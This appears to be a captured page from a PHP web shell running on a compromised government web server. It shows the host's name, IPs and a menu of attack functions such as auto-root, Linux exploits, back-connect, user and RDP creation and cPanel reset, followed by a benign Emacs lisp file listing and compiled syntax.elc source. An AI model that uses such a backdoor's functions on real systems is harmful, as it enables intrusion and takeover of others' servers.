Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
emacs-lisp /
[ HOME SHELL ]
Name
Size
Permission
Action
advice.elc
60.71
KB
-rw-r--r--
assoc.elc
4.37
KB
-rw-r--r--
authors.elc
27.41
KB
-rw-r--r--
autoload.elc
15.7
KB
-rw-r--r--
avl-tree.elc
15.92
KB
-rw-r--r--
backquote.elc
4.46
KB
-rw-r--r--
benchmark.elc
3.33
KB
-rw-r--r--
bindat.elc
10.84
KB
-rw-r--r--
byte-opt.elc
34.22
KB
-rw-r--r--
byte-run.elc
6.65
KB
-rw-r--r--
bytecomp.elc
124.99
KB
-rw-r--r--
check-declare.elc
8.77
KB
-rw-r--r--
checkdoc.elc
65.08
KB
-rw-r--r--
cl-compat.elc
4.28
KB
-rw-r--r--
cl-extra.elc
21.48
KB
-rw-r--r--
cl-indent.elc
13.98
KB
-rw-r--r--
cl-loaddefs.el
39.57
KB
-rw-r--r--
cl-macs.elc
99.36
KB
-rw-r--r--
cl-seq.elc
43.98
KB
-rw-r--r--
cl-specs.el
13.87
KB
-rw-r--r--
cl.elc
20.74
KB
-rw-r--r--
copyright.elc
8.64
KB
-rw-r--r--
crm.elc
7.94
KB
-rw-r--r--
cust-print.elc
12.77
KB
-rw-r--r--
debug.elc
24.86
KB
-rw-r--r--
derived.elc
10.72
KB
-rw-r--r--
disass.elc
5.09
KB
-rw-r--r--
easy-mmode.elc
14.85
KB
-rw-r--r--
easymenu.elc
20.15
KB
-rw-r--r--
edebug.elc
100.82
KB
-rw-r--r--
eldoc.elc
15.31
KB
-rw-r--r--
elint.elc
19.76
KB
-rw-r--r--
elp.elc
12.78
KB
-rw-r--r--
ewoc.elc
28.62
KB
-rw-r--r--
find-func.elc
17.26
KB
-rw-r--r--
find-gc.elc
3.74
KB
-rw-r--r--
float-sup.elc
1.39
KB
-rw-r--r--
generic.elc
6.55
KB
-rw-r--r--
gulp.elc
4.82
KB
-rw-r--r--
helper.elc
3.84
KB
-rw-r--r--
levents.elc
10.29
KB
-rw-r--r--
lisp-mnt.elc
21.87
KB
-rw-r--r--
lisp-mode.elc
37.14
KB
-rw-r--r--
lisp.elc
21.61
KB
-rw-r--r--
lmenu.elc
11.67
KB
-rw-r--r--
lucid.elc
6.22
KB
-rw-r--r--
macroexp.elc
4.45
KB
-rw-r--r--
map-ynp.elc
6.3
KB
-rw-r--r--
pp.elc
5.09
KB
-rw-r--r--
re-builder.elc
22.36
KB
-rw-r--r--
regexp-opt.elc
4.43
KB
-rw-r--r--
regi.elc
6.15
KB
-rw-r--r--
ring.elc
6.41
KB
-rw-r--r--
rx.elc
26.61
KB
-rw-r--r--
shadow.elc
5.63
KB
-rw-r--r--
sregex.elc
12.45
KB
-rw-r--r--
syntax.elc
5.18
KB
-rw-r--r--
tcover-ses.elc
14.68
KB
-rw-r--r--
tcover-unsafep.elc
4.09
KB
-rw-r--r--
testcover.elc
13.41
KB
-rw-r--r--
timer.elc
22.73
KB
-rw-r--r--
tq.elc
3.94
KB
-rw-r--r--
trace.elc
5.28
KB
-rw-r--r--
unsafep.elc
5.01
KB
-rw-r--r--
warnings.elc
9.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : syntax.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:02:22 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/emacs-lisp/syntax.el ;;; in Emacs version 23.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`syntax.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (defalias 'syntax-ppss-depth #[(ppss) "@\207" [ppss] 1]) (put 'syntax-ppss-depth 'byte-optimizer 'byte-compile-inline-expand) #@421 Get the latest syntactically outermost position found in a syntactic scan. PPSS is a scan state, as returned by `partial-parse-sexp' or `syntax-ppss'. An "outermost position" means one that it is outside of any syntactic entity: outside of any parentheses, comments, or strings encountered in the scan. If no such position is recorded in PPSS (because the end of the scan was itself at the outermost level), return nil. (defalias 'syntax-ppss-toplevel-pos #[(ppss) "\3018@\206\n \3028\207" [ppss 9 8] 2 (#$ . 740)]) (defalias 'syntax-ppss-context #[(ppss) "\3018\203 \302\207\3038\203 \304\207\305\207" [ppss 3 string 4 comment nil] 2]) (put 'syntax-ppss-context 'byte-optimizer 'byte-compile-inline-expand) #@181 Threshold below which cache info is deemed unnecessary. We try to make sure that cache entries are at least this far apart from each other, to avoid keeping too much useless info. (defvar syntax-ppss-max-span 20000 (#$ . 1461)) #@174 Function to move back outside of any comment/string/paren. This function should move the cursor back to some syntactically safe point (where the PPSS is equivalent to nil). (defvar syntax-begin-function nil (#$ . 1696)) #@54 List of (POS . PPSS) pairs, in decreasing POS order. (defvar syntax-ppss-cache nil (#$ . 1922)) (make-variable-buffer-local 'syntax-ppss-cache) #@34 Cache of (LAST-POS . LAST-PPSS). (defvar syntax-ppss-last nil (#$ . 2072)) (byte-code "\300\301!\210\302\303\304\"\207" [make-variable-buffer-local syntax-ppss-last defalias syntax-ppss-after-change-function syntax-ppss-flush-cache] 3) #@60 Flush the cache of `syntax-ppss' starting at position BEG. (defalias 'syntax-ppss-flush-cache #[(beg &rest ignored) "\203 \211@@)\nV\203 A\211\204 \n@\206 \304W\205; \n\305A!\2060 \3068\2060 \304X\2038 \307\211\207\307\240\207" [syntax-ppss-cache x beg syntax-ppss-last 0 syntax-ppss-toplevel-pos 3 nil] 4 (#$ . 2314)]) (byte-code "\301B\302\301!\204 \303\301\304\"\210\301\207" [current-load-list syntax-ppss-stats default-boundp set-default [(0 . 0.0) (0 . 0.0) (0 . 0.0) (0 . 0.0) (0 . 0.0) (1 . 2500.0)]] 3) (defalias 'syntax-ppss-stats #[nil "\301\302\"\207" [syntax-ppss-stats mapcar #[(x) "\300\301\302\217\207" [nil (byte-code "@\301A@\245!B\207" [x truncate] 4) ((error))] 3]] 3]) #@234 Parse-Partial-Sexp State at POS, defaulting to point. The returned value is the same as `parse-partial-sexp' except that the 2nd and 6th values of the returned state cannot be relied upon. Point is at POS when this function returns. (defalias 'syntax-ppss #[(&optional pos) "\204 ` A @\306e\f\203 \fV\203 \306\306\307\310\217,\207" [pos syntax-ppss-last pt-min ppss old-pos old-ppss nil (byte-code "\2036 Z\n\306HA\n\306H@T\245\307_W\2036 \n\310H\n\310H@T\240\210\n\310H\n\310HA Z\\\241\210\311 \312\211%\207\204z \203z \313!\206G \3078\211\203z \f X\203z \fZ W\203z \n\314H\n\314H@T\240\210\n\314H\n\314HA \fZ\\\241\210\311\f \"\2026\312ee\312\203\250 \211 @@)W\203\250 A\211\204\216 \203\300 \211 @@)\211 @A)\204\321 !\204\321 \315\316\317\320\211$\210\203\333 \fW\203\345 \f\202\n\321H\n\321H@T\240\210\n\321H\n\321HA Z\\\241\210\204\322\323!\203\203\324\325!\210\203S b\210 \210`V\203S\326`\327\"\330>\204S\n\306H\n\306H@T\240\210\n\306H\n\306HA `Z\\\241\210`\312 Z W\203\202\n\307H\n\307H@T\240\210\n\307H\n\307HA Z\\\241\210\311 \312\211%\2025\n\331H\n\331H@T\240\210\n\331H\n\331HA \fZ\\\241\210 \fZ \307_V\203\326\311\f\211 \\\307\245\211\312\211%\fB\"\203\313\"AB\241\210\202\322\"B)\202\231\311\f \312\211% B\"\203\211 @@) Z V\203\"AB\241\210\2024\"\240\210\2024\203$\211 @@) Z V\203.\"B\2024\"\240\210)- B!\207" [old-pos pos syntax-ppss-stats old-ppss pt-min syntax-ppss-max-span 5 2 0 parse-partial-sexp nil syntax-ppss-toplevel-pos 1 add-hook before-change-functions syntax-ppss-flush-cache t 4 boundp font-lock-beginning-of-syntax-function make-local-variable syntax-begin-function get-text-property face (font-lock-string-face font-lock-doc-face font-lock-comment-face) 3 ppss syntax-ppss-cache ppss-best pt-best cache cache-pred x syntax-ppss-last pair] 7) ((args-out-of-range (byte-code "\301e\"\207" [pos parse-partial-sexp] 3)))] 4 (#$ . 3032)]) (defalias 'syntax-ppss-debug #[nil "\305\211\306\ne\305BC\"\305\211\203* \f@ \203 @ZB@\fA\211\204 **\207" [min-diffs pt syntax-ppss-cache x #1=#:--cl-dolist-temp-- nil append] 5]) (provide 'syntax)
Close